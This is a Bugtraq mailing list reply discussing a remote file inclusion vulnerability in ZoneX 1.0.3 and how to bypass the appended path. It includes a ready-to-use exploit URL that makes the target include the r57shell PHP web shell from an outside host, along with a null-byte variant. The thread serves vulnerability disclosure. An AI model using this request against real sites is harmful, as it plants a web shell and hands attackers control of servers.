Bugtraq mailing list archives
Re: ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion Vulnerability
From: str0ke <str0ke () milw0rm com>
Date: Thu, 7 Sep 2006 11:39:04 -0500
On 9/6/06, Steven M. Christey <coley () mitre org> wrote:
In a typical PHP exploit scenario, the attacker could merely add a null byte ("%00") to the phpbb_root_path parameter, which would then cause the include call to ignore this extra file tree/name information. Is there some reason why a null byte wouldn't work in this situation?
You would basically just need to add ?& to the end of the http get request as so if your including a remote file, since you would be placing the remaining file tree as a variable name. http://www.site.com/[path]/includes/usercp_register.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?& Using a null byte should work if magic_quotes = off. Best Regards, /str0ke
Current thread:
- Re: ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion Vulnerability Steven M. Christey (Sep 07)
- Re: ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion Vulnerability str0ke (Sep 07)